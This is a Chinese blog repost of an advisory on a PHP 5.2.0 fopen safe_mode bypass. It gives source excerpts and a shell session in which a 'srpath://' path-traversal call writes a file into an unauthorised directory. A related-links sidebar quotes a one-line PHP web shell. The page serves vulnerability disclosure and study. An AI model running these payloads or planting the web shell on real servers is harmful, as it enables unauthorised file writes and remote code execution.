fopen php漏洞,PHP FOpen Safe_Mode限制绕过漏洞

最新推荐文章于 2023-04-01 23:39:06 发布
最新推荐文章于 2023-04-01 23:39:06 发布
阅读量404 收藏 1
点赞数
文章标签: fopen php漏洞

PHP是一款开放源代码的网络编程语言。

PHP存在安全模式绕过问题,远程攻击者可以利用漏洞写文件到其他未授权位置,建立文件并执行。

在PHP 5.2.0中可使用写模式绕过safe_mode,fopen()函数描述如下:

- -845-845--- Code from PHP520 ext/standard/file.c [START]

stream = php_stream_open_wrapper_ex(filename, mode, (use_include_path ? USE_PATH : 0) |

ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL, context);

- -845-845--- Code from PHP520 ext/standard/file.c [END]

再看safe_mode.c

- -142-152--- Code from main/safe_mode.c [START]

ret = VCWD_STAT(path, &sb);

if (ret < 0) {

if ((flags & CHECKUID_NO_ERRORS) == 0) {

php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unable to access %s", filename);

}

return 0;

}

duid = sb.st_uid;

dgid = sb.st_gid;

if (duid == php_getuid()) {

return 1;

- -142-152--- Code from main/safe_mode.c [END]

如果duid == php_getuid(), safe_mode将被绕过。

#define VCWD_STAT(path, buff) virtual_stat(path, buff TSRMLS_CC)

这里查看virtual_stat()函数:

- -831-845--- Code from TSRM/tsrm_virtual_cwd.c [START]

CWD_API int virtual_stat(const char *path, struct stat *buf TSRMLS_DC)

{

cwd_state new_state;

int retval;

CWD_STATE_COPY(&new_state, &CWDG(cwd));

if (virtual_file_ex(&new_state, path, NULL, 1)) {

return -1;

}

retval = stat(new_state.cwd, buf);

CWD_STATE_FREE(&new_state);

return retval;

}

- -831-845--- Code from TSRM/tsrm_virtual_cwd.c [END]

我们尝试写入文件/dir/pliczek.

cxib# uname -a

FreeBSD cxib.laptop 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 08:43:30 UTC 2007

root@portnoy.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP amd64

cxib# php -r 'fopen("/dir/pliczek", "a");'

Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1030 is not

allowed to access /dir owned by uid 80 in Command line code on line 1

Warning: fopen(/dir/pliczek): failed to open stream: Invalid argument in Command line code on

line 1

cxib# php -r 'fopen("compress.zlib://../../../../../../../dir/pliczek",

"a");'

Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1030 is not

allowed to access /dir owned by uid 80 in Command line code on line 1

Warning: fopen(compress.zlib://../../../../../../../dir/pliczek): failed to open stream:

Invalid argument in Command line code on line 1

cxib# php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'

cxib# ls -la /dir/pliczek

- -rw-r--r-- 1 cxib www 0 Jan 19 21:26 /dir/pliczek

srpath不存在,如果使用写模式那么safe_mode更改文件路径并使duid == php_getuid()。

fopen("compress.zlib://../../../../../../../dir/pliczek", "a");

Safe_mode移去前缀并VCWD_STAT("/dir/pliczek", &sb);由于在"/dir"目录中建立"pliczek"文件,那么就只对"dir"权限进行检查。

如果使用:

fopen("srpath://../../../../../../../dir/pliczek", "a");

srpath不存在,函数stat为

VCWD_STAT("/dir_wher_are_you/srpath:", &sb) return 1.

那么stat()从dir "/dir_wher_are_you/"中给定权限。

PHP PHP 5.2

目前没有解决方案提供,请关注以下链接:

http://www.php.net/

loading-bars.svg

韩之昱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
code blue CTF 2019 fopen RCE 漏洞的 Writeup
systemino的博客
11-22 538
0x01 介绍 最近,我在打CODE BLUE CTF 2019决赛,里面有一道题目是通过fopen的第二个参数进行RCE,奇热在这篇文章我会详细说明解这道题目的方法。 首先,将下面两个文件放在/home/user目录: gconv-modules modulePAYLOAD//INTERNAL../../../../../../../../home/user/pa...
PHP safe_mode开启对于PHP系统函数有什么影响
12-16
safe_mode是提供一个基本安全的共享...因此,在safe_mode打开的情况下,下列函数将会收到限制: ckdir, move_uploaded_file, chgrp, parse_ini_file, chown,rmdir, copy, rename, fopen, require, highligh
fopen php漏洞,在phpfopen中利用漏洞
weixin_32027491的博客
03-10 434
我认为他们指的是CRLF漏洞.在您的示例漏洞利用代码中,您传递了一些PHP代码,但这不是您要做的.目标是让fopen从互联网上打开一个文件.如果$email变量包含由CRLF分隔的两个字符串,则可以让fopen()访问那里不应该访问的外部网站.一切都取决于之后的$fh文件描述符会发生什么,它将决定你将如何利用它.发布更多代码后编辑:我们开始时你可以强制$password到你想要的值.所以游戏的名称...
php crypt函数缓冲区溢出漏洞,PHPcrypt()”函数安全限制绕过漏洞
weixin_33483080的博客
03-24 247
发布日期:2012-02-02更新日期:2012-02-03受影响系统:Apple MacOS X Server 10.xPHP PHP 5.3.7PHP PHP 5.3.6PHP PHP 5.3.5不受影响系统:Apple MacOS X Server 10.7.3PHP PHP 5.3.8描述:--------------------------------------------------...
php文件包含绕过,文件包含漏洞(绕过姿势) | nmask's Blog
weixin_35094408的博客
03-18 745
谁将烟焚散,散了纵横的牵绊文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell....
fopen打开ftp文件_PHP RFI allow_url_include 远程文件包含漏洞
weixin_39609887的博客
11-25 387
一、漏洞概述php默认配置中”allow_url_include”默认设置为关闭,使PHP无法加载远程http(s)或FTP url,防止文件包含攻击。即使” allow_url_include”和” allow_url_fopen”都Off也不会阻止SMB URL的加载。当有漏洞PHP程序,试图从攻击者的SMB共享中加载文件时,如果SMB共享允许访问该文件。攻击者需要将SMB服务器...
PHP安全配置详细说明
10-28
若需在安全模式下包含特定目录的文件,可以使用`safe_mode_include_dir`,例如:`safe_mode_include_dir = /usr/local/include/php`。对于需要执行的文件,可以设置`safe_mode_exec_dir`,如:`safe_mode_exec_dir =...
PHP海洋cms(海洋视频内容管理系统)
最新发布
08-15
| safe_mode:本系统不支持在非win主机的安全模式下运行 | GD:不支持将导致与图片相关功能无法使用或引发警告 | Curl:不支持将无法进行百度推送和图片同步等操作 | SSL:邮件SMTP发信服务要求开启SSL支持 # 安装...
PHP中关于php.ini参数优化详解
10-15
2. 安全模式GID(safe_mode_gid): 当safe_mode开启时,这个参数决定是否允许同一组用户访问文件。关闭它以避免不必要的权限问题: ``` safe_mode_gid = Off ``` 3. 禁用危险函数(disable_functions): ...
linux fopen 安全函数,Horizon QCMS 'fopen()'函数目录遍历漏洞
weixin_39517859的博客
05-03 144
发布日期:2014-01-08更新日期:2014-01-12受影响系统:Horizon QCMS Horizon QCMS <= 4.0描述:--------------------------------------------------------------------------------BUGTRAQ ID: 64717CVE(CAN) ID: CVE-2013-7138Ho...
任意文件包含漏洞绕过方式
qq_41679358的博客
08-23 3746
本文转自行云博客https://www.xy586.top/ 文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结 前期准备 file.php代码 <?php $a = $_GET['a']; include($a.'.html'); ?> hack.php代码 <?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?&.
文件包含漏洞
huangyongkang666的博客
03-21 2479
文件包含漏洞 1.什么是文件包含 ​ 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 2. 文件包含漏洞原理 ​ 文件包含是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数 (include(),require()和include_once(),requir_once()) 利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令
任意文件读取/下载漏洞总结
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
如何防止php漏洞,关于PHP漏洞以及如何防止PHP漏洞
weixin_34446948的博客
03-19 149
【IT168 评论】漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露、cookie伪造、CSRF(跨站请求)等。这些漏洞不仅仅是针对PHP语言的,本文只是简单介绍PHP如何有效防止这些漏洞。1.xss + sql注入(关于xss攻击详细介绍)其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注...
PHP文件包含漏洞攻防实战
weixin_30687811的博客
11-04 1576
摘要 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。 1....
利用本地包含漏洞执行任意代码
热门推荐
cnbird's blog
01-19 2万+
1 概述   文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。 本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web
PHP文件包含漏洞详解
xysoul的专栏
06-30 1万+
http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以
CRLF Injection 攻击
|独自望海。。。
11-13 1171
PHP 的 fopen(), file() 及其它函数存在一个缺陷,即用户随意地添加额外HTTP报头信息到HTTP请求数据包中。攻击者可以利用此缺陷绕过服务器的安全限制,进行非法访问。在某些情况下,这个缺陷甚至可以打开任意的网络连接,在代理端执行PHP脚本和打开邮件转发。 PHP 有一些函数用文件名(如:fopen(), file()等)作为它们的参数。如果在php.ini中allow_url_f
allow_url_fopen漏洞
05-24
allow_url_fopenPHP 中的一个配置项,用于控制是否允许在 fopen()、file_get_contents()、readfile() 等函数中...另外,还可以使用 PHP 的安全模式(safe_mode)来限制对文件系统的访问,从而进一步提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值